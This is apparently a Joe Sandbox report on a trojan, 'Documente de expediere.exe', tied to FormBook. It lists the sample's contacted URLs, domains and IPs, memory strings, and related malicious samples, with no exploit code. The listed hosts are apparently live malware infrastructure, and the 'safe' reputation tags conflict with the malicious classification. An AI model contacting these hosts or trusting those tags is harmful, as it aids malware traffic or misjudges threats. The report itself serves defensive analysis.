            http://www.jleabres.com/w977/?5HE=Azoptr76oomZ4omVga/Zpvzn3e5/jEQILAaug91rkSWZLV4kzjGPp1+9B2L+PrxFmPSw5JOBqYEy7G3QmPMO+i+kevqWQBtSr1hLWjIV+6WjfyA1QEzp+Ir7n0GaYPvcmgAl6gWaxTBt&UXR=kTP8XfI80%Avira URL Cloudsafe
            http://www.fardehb.top/or4s/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.karak-networks.online/2afv/?5HE=hLY9GbFjrTr/Z7Z1J1n+8mxvovTjHVjaQ1TETPlxVVMVYtq2nLqFQ+qvrj4cFtmldoUiHIajNLHyMvL4kY+KeK3n/v9QeqmigNuoWlpmTNFJx52laQwxR7zETdE9Da/cctIuDpSkBIav&UXR=kTP8XfI80%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.ecoaxion.com/m8jb/0%Avira URL Cloudsafe
            http://www.fardehb.top/or4s/?5HE=UOVTILZNORwRjwgBkAdUsPPg2JHxvT7McsE496DqNpR2tR/wGus0wQl5jLS0JR4P7qKOiEjtUO6PhFxn6GFMV2L3p99CK/w4pk8/xjMAjlx+vsYxSa6ADJMuQ/dVnyYbrtzDu6vYzAhS&UXR=kTP8XfI80%Avira URL Cloudsafe
            http://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI80%Avira URL Cloudsafe
            http://www.nationsincbook.com/ka5q/0%Avira URL Cloudsafe
            http://www.809934.com/vqsg/0%Avira URL Cloudsafe
            http://www.karak-networks.online/2afv/0%Avira URL Cloudsafe
            https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c0%Avira URL Cloudsafe
            http://www.shiybalinks.com/knjl/0%Avira URL Cloudsafe
            http://www.betano627.com/5jc8/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.shiybalinks.com/knjl/0%VirustotalBrowse
            http://www.italyuntold.com/5yb0/?5HE=6Dg8z4KG4YPExlQ9XMiCDUjuBaAtCe8c6s2BJ4Cptukw6Fp783jCo9a8aBIuYHvq1uoCHxO9BKTCqzYY5Vc8A4FzhFFqSFNP5lWxTqvoYXkdyieyJBVlwNBJ3PLm6lrF0y9xthhOWCBy&UXR=kTP8XfI80%Avira URL Cloudsafe
            http://www.gtprivatewealth.com/c4g1/0%Avira URL Cloudsafe
            http://www.funnelkakes.com/sgjw/?5HE=KIlhclE33g4p4bCYeWfzGem6xaRipp25IwoHZsonIzqxF8P3vwkjyQxG0+k1uafiZ5V1+a0hVzemZgjWOIKcqi50j1ligTTnKiK+69bNO3Q0fQNjMb89nuUv03Pn1kYgjPKVAy4urBGQ&UXR=kTP8XfI80%Avira URL Cloudsafe
            https://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN0%Avira URL Cloudsafe
            https://www.fastmail.help/hc/en-us/articles/15000002801410%Avira URL Cloudsafe
            http://www.809934.com/vqsg/?5HE=oEbg7hQU3MdCAI1Qzg6FnUbuYrpcD6PCFR/op5n6toe9jhHpPI7gLsdW3wxEsJ1FGff0/+qDBwgK/n9QPqrWSnFVgwucvZm42LyzbELDPU/Ii2JDfpNRbGk3upTzOCY2A4WqGnxtTcSM&UXR=kTP8XfI80%Avira URL Cloudsafe
            https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c0%VirustotalBrowse
            http://www.betano627.com/5jc8/?5HE=SGmAsJs22AX1ghH/bJyjJOhI3u1qaDFYGxKt82Fw19pLlHDYBaMekb65pyujOkSYs7LYFrx9Bf/HP6/nbBjkeU53huHOszAAxfxDrGe5Zlk4W5YDgBaJ8zAbn1c/SvwA0vRZEPbSBJgr&UXR=kTP8XfI80%Avira URL Cloudsafe
            http://www.jleabres.com/w977/0%Avira URL Cloudsafe
            http://www.nationsincbook.com/ka5q/?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI80%Avira URL Cloudsafe
            https://www.fastmailusercontent.com/filestorage/css/main.css0%Avira URL Cloudsafe
            http://www.olhadeputat.com/xm40/0%Avira URL Cloudsafe
            http://www.karak-networks.online0%Avira URL Cloudsafe
            http://www.olhadeputat.com/xm40/?5HE=daAh1PvHixV61uAQZMYKPaNePBcxkEwbh0Ym6iIWO855OlL+0fA+LsjnAgtj7WyOZoCeoLSk25i6sMGFDrtEZ/sdfpdR1CdNhpbdr9VgkorBlDalMPv+Xn4VuwyhQF+VdIAPT792X8nN&UXR=kTP8XfI80%Avira URL Cloudsafe
            http://www.evoolihubs.shop/bked/0%Avira URL Cloudsafe
            http://www.funnelkakes.com/sgjw/0%Avira URL Cloudsafe
            http://www.ecoaxion.com/m8jb/?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI80%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            shiybalinks.com
            		3.33.130.190
            		truefalse
              		unknown
              www.evoolihubs.shop
              		188.114.96.3
              		truefalseunknown
              betano627.com
              		3.33.130.190
              		truefalse
                		unknown
                italyuntold.com
                		3.33.130.190
                		truefalse
                  		unknown
                  gtprivatewealth.com
                  		3.33.130.190
                  		truefalse
                    		unknown
                    nationsincbook.com
                    		3.33.130.190
                    		truefalse
                      		unknown
                      funnelkakes.com
                      		76.223.67.189
                      		truefalseunknown
                      www.ecoaxion.com
                      		13.248.169.48
                      		truefalse
                        		unknown
                        www.olhadeputat.com
                        		188.114.97.3
                        		truefalse
                          		unknown
                          www.809934.com
                          		148.135.97.125
                          		truefalse
                            		unknown
                            sehraji.com
                            		84.32.84.32
                            		truefalse
                              		unknown
                              www.fardehb.top
                              		203.161.41.207
                              		truefalse
                                		unknown
                                www.jleabres.com
                                		103.168.172.37
                                		truefalseunknown
                                karak-networks.online
                                		84.32.84.32
                                		truefalseunknown
                                www.nationsincbook.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.marktuana.com
                                  		unknown
                                  		unknowntrueunknown
                                  www.shiybalinks.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.karak-networks.online
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.sehraji.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.funnelkakes.com
                                        		unknown
                                        		unknowntrueunknown
                                        www.gtprivatewealth.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.betano627.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.italyuntold.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.jleabres.com/w977/?5HE=Azoptr76oomZ4omVga/Zpvzn3e5/jEQILAaug91rkSWZLV4kzjGPp1+9B2L+PrxFmPSw5JOBqYEy7G3QmPMO+i+kevqWQBtSr1hLWjIV+6WjfyA1QEzp+Ir7n0GaYPvcmgAl6gWaxTBt&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fardehb.top/or4s/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.sehraji.com/rjez/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.karak-networks.online/2afv/?5HE=hLY9GbFjrTr/Z7Z1J1n+8mxvovTjHVjaQ1TETPlxVVMVYtq2nLqFQ+qvrj4cFtmldoUiHIajNLHyMvL4kY+KeK3n/v9QeqmigNuoWlpmTNFJx52laQwxR7zETdE9Da/cctIuDpSkBIav&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ecoaxion.com/m8jb/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fardehb.top/or4s/?5HE=UOVTILZNORwRjwgBkAdUsPPg2JHxvT7McsE496DqNpR2tR/wGus0wQl5jLS0JR4P7qKOiEjtUO6PhFxn6GFMV2L3p99CK/w4pk8/xjMAjlx+vsYxSa6ADJMuQ/dVnyYbrtzDu6vYzAhS&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.nationsincbook.com/ka5q/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.809934.com/vqsg/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.karak-networks.online/2afv/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.shiybalinks.com/knjl/false
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.betano627.com/5jc8/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.italyuntold.com/5yb0/?5HE=6Dg8z4KG4YPExlQ9XMiCDUjuBaAtCe8c6s2BJ4Cptukw6Fp783jCo9a8aBIuYHvq1uoCHxO9BKTCqzYY5Vc8A4FzhFFqSFNP5lWxTqvoYXkdyieyJBVlwNBJ3PLm6lrF0y9xthhOWCBy&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.funnelkakes.com/sgjw/?5HE=KIlhclE33g4p4bCYeWfzGem6xaRipp25IwoHZsonIzqxF8P3vwkjyQxG0+k1uafiZ5V1+a0hVzemZgjWOIKcqi50j1ligTTnKiK+69bNO3Q0fQNjMb89nuUv03Pn1kYgjPKVAy4urBGQ&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.gtprivatewealth.com/c4g1/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.betano627.com/5jc8/?5HE=SGmAsJs22AX1ghH/bJyjJOhI3u1qaDFYGxKt82Fw19pLlHDYBaMekb65pyujOkSYs7LYFrx9Bf/HP6/nbBjkeU53huHOszAAxfxDrGe5Zlk4W5YDgBaJ8zAbn1c/SvwA0vRZEPbSBJgr&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.809934.com/vqsg/?5HE=oEbg7hQU3MdCAI1Qzg6FnUbuYrpcD6PCFR/op5n6toe9jhHpPI7gLsdW3wxEsJ1FGff0/+qDBwgK/n9QPqrWSnFVgwucvZm42LyzbELDPU/Ii2JDfpNRbGk3upTzOCY2A4WqGnxtTcSM&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jleabres.com/w977/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.nationsincbook.com/ka5q/?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.olhadeputat.com/xm40/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.olhadeputat.com/xm40/?5HE=daAh1PvHixV61uAQZMYKPaNePBcxkEwbh0Ym6iIWO855OlL+0fA+LsjnAgtj7WyOZoCeoLSk25i6sMGFDrtEZ/sdfpdR1CdNhpbdr9VgkorBlDalMPv+Xn4VuwyhQF+VdIAPT792X8nN&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.evoolihubs.shop/bked/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.funnelkakes.com/sgjw/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ecoaxion.com/m8jb/?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPsvchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/chrome_newtabcertutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/ac/?q=certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.csvchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.ecosia.org/newtab/certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHNcertutil.exe, 0000000E.00000002.3715079219.0000000006960000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000003890000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.fastmail.help/hc/en-us/articles/1500000280141certutil.exe, 0000000E.00000002.3715079219.00000000067CE000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.00000000036FE000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcertutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.fastmailusercontent.com/filestorage/css/main.csscertutil.exe, 0000000E.00000002.3715079219.00000000067CE000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.00000000036FE000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.karak-networks.onlineQAWHbhvedb.exe, 0000000F.00000002.3716040439.0000000004FD8000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              103.168.172.37
                                              		www.jleabres.comunknown
                                              		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                              13.248.169.48
                                              		www.ecoaxion.comUnited States
                                              		16509AMAZON-02USfalse
                                              188.114.97.3
                                              		www.olhadeputat.comEuropean Union
                                              		13335CLOUDFLARENETUSfalse
                                              76.223.67.189
                                              		funnelkakes.comUnited States
                                              		16509AMAZON-02USfalse
                                              188.114.96.3
                                              		www.evoolihubs.shopEuropean Union
                                              		13335CLOUDFLARENETUSfalse
                                              84.32.84.32
                                              		sehraji.comLithuania
                                              		33922NTT-LT-ASLTfalse
                                              203.161.41.207
                                              		www.fardehb.topMalaysia
                                              		45899VNPT-AS-VNVNPTCorpVNfalse
                                              148.135.97.125
                                              		www.809934.comSweden
                                              		158ERI-ASUSfalse
                                              3.33.130.190
                                              		shiybalinks.comUnited States
                                              		8987AMAZONEXPANSIONGBfalse

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1477464
                                              Start date and time:2024-07-21 13:29:28 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 11m 2s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:21
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Documente de expediere.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@7/5@17/9
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 96%
                                              • Number of executed functions: 57
                                              • Number of non-executed functions: 275
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target QAWHbhvedb.exe, PID 396 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              09:18:27API Interceptor9454911x Sleep call for process: certutil.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              103.168.172.37jlsvOH1c8bSRKqM.exeGet hashmaliciousFormBookBrowse
                                              • www.jleabres.com/blhi/
                                              eNXDCIvEXI.exeGet hashmaliciousFormBookBrowse
                                              • www.celebration24.co.uk/mcz6/
                                              H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                              • www.celebration24.co.uk/mcz6/
                                              Factura (3).exeGet hashmaliciousFormBookBrowse
                                              • www.celebration24.co.uk/mcz6/
                                              PO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.celebration24.co.uk/pq0o/
                                              13.248.169.48Shipping Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.ansverity.com/7llb/
                                              payment swift 77575.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.cyclope.us/lmp7/
                                              H37012.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.omlyes.com/h209/?8pYtNR=AvKPPvPH0Z4T&nffDxB=iZtTggAtf0B+j3fOE6HWriWWpmX0i4qAS7HiYOC76+2tWZxBemDORvlFY8e+3zKAzMXK
                                              Inquiry files v2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.techacademy.store/cf3x/
                                              nK1Y86mbzfbkwpB.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.techacademy.store/cf3x/
                                              SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.16736.4797.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.ansverity.com/7llb/
                                              OrderPI.exeGet hashmaliciousFormBookBrowse
                                              • www.cetys.com/6uii/
                                              PO HA25622.exeGet hashmaliciousFormBookBrowse
                                              • www.webmedianews.com/h209/?Dzrx=fA8Yes4AKfUDc53Wnj6AqZfIYHxfB2WY7SMSertcKD9M3ZyyZdC5GDMmxBggMfVQA7Zc&mlYT=SxolxB
                                              IMG_00110724.exeGet hashmaliciousFormBookBrowse
                                              • www.ansverity.com/7llb/
                                              SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exeGet hashmaliciousFormBookBrowse
                                              • www.ansverity.com/7llb/
                                              188.114.97.3IEnetcache.htaGet hashmaliciousCobalt Strike, FormBook, GuLoaderBrowse
                                              • www.bowxsplain.xyz/3nh2/
                                              Price List.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                              • gurl.pro/skohle
                                              PO_202407174854.xlsGet hashmaliciousUnknownBrowse
                                              • gurl.pro/kdp5hn
                                              PO_202407174854.xlsGet hashmaliciousUnknownBrowse
                                              • gurl.pro/kdp5hn
                                              payment swift 77575.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.tktokopedia.vip/5s4h/
                                              SecuriteInfo.com.Win32.MalwareX-gen.23257.3368.exeGet hashmaliciousFormBookBrowse
                                              • www.adigidea.com/mu94/?mHLHPL=8XOV7l9czMl0BY0Yfw8K+bslCpjGRTxLH8wb+mkhMYxfonFif4r3bWu7Z4KNa8GAkHUscmW3PA==&nfkddr=R4rDfZ
                                              BSX#24001602.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • bshd1.shop/OP341/index.php
                                              NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.okbharat.best/976u/?L67dy=LcbIMBKHrUlu6g3+s5ZJggsLZ4EkQq4qBqn1SkrzjOBWV2IrUom/64+35gCpT46aLOm4V6t+Xi15cxz33W19sMSR+lb0o4YODFAMPjkJlAv5H57LJA==&zP=ivqLGH1h
                                              42ZjBoAnX1.rtfGet hashmaliciousFormBookBrowse
                                              • www.mtplus.online/sk49/?aBWDfH=DP6tx2QHp&K4lp=vYCMgY7XjBZl5nBh+gwJqyUJvQ4WqZqIv44MKWq7JUyccEz8DNQVWvH3FVsEB9Oz/eitLg==
                                              Quotation.xlsGet hashmaliciousRemcosBrowse
                                              • gurl.pro/fycglx

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.evoolihubs.shopdocs_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 188.114.96.3
                                              SHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 188.114.96.3
                                              purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 188.114.96.3
                                              PO454355 Pdf.exeGet hashmaliciousFormBookBrowse
                                              • 188.114.96.3
                                              Quotation List Pdf.exeGet hashmaliciousFormBookBrowse
                                              • 188.114.97.3
                                              arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 188.114.97.3
                                              AirWaybill_Document Pdf.exeGet hashmaliciousFormBookBrowse
                                              • 188.114.97.3
                                              www.jleabres.comjlsvOH1c8bSRKqM.exeGet hashmaliciousFormBookBrowse
                                              • 103.168.172.37
                                              DHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                                              • 103.168.172.52
                                              www.olhadeputat.comAWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.146.224
                                              www.fardehb.topYour file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.41.207

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSAV 122769 - REFUND.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              CERERE DE PROPUNERE.pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              Mm3Sjia18h.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 188.114.96.3
                                              D8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                              • 172.66.43.27
                                              y3Bn3D8pOT.rtfGet hashmaliciousUnknownBrowse
                                              • 172.66.40.229
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 172.64.41.3
                                              CrowdStrike.exeGet hashmaliciousHatef WiperBrowse
                                              • 104.16.185.241
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 162.159.61.3
                                              CrowdStrike.exeGet hashmaliciousHatef WiperBrowse
                                              • 104.16.185.241
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 162.159.61.3
                                              AMAZON-02USD8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                              • 3.64.163.50
                                              VAdlEMbrmJ.elfGet hashmaliciousUnknownBrowse
                                              • 34.249.145.219
                                              Z4mLZDVZY3.elfGet hashmaliciousUnknownBrowse
                                              • 54.171.230.55
                                              iGs5wjZOhO.elfGet hashmaliciousUnknownBrowse
                                              • 54.247.62.1
                                              d92eGGZPEg.elfGet hashmaliciousGafgytBrowse
                                              • 54.217.10.153
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 143.204.215.18
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 143.204.215.18
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 143.204.215.18
                                              Injector.exeGet hashmaliciousZTratBrowse
                                              • 18.158.58.205
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 143.204.215.18
                                              CLOUDFLARENETUSAV 122769 - REFUND.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              CERERE DE PROPUNERE.pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              Mm3Sjia18h.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 188.114.96.3
                                              D8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                              • 172.66.43.27
                                              y3Bn3D8pOT.rtfGet hashmaliciousUnknownBrowse
                                              • 172.66.40.229
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 172.64.41.3
                                              CrowdStrike.exeGet hashmaliciousHatef WiperBrowse
                                              • 104.16.185.241
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 162.159.61.3
                                              CrowdStrike.exeGet hashmaliciousHatef WiperBrowse
                                              • 104.16.185.241
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 162.159.61.3
                                              AARNET-AS-APAustralianAcademicandResearchNetworkAARNedesDGzeznq.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 103.169.127.247
                                              92.249.48.47-skid.arm7-2024-07-20T09_04_19.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 103.183.132.59
                                              kz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
                                              • 103.174.178.147
                                              1721381284a144721a6b00c564aa1361f546102802d576ee829fd360b164bfc3ee68cc858a889.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                              • 103.161.133.243
                                              PURCHASING ORDER.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 103.169.142.0
                                              uM1zMBpd2h.rtfGet hashmaliciousRemcosBrowse
                                              • 103.161.133.121
                                              SecuriteInfo.com.Trojan.Siggen29.4082.22291.17805.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 103.186.117.150
                                              Enquiry.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 103.186.117.89
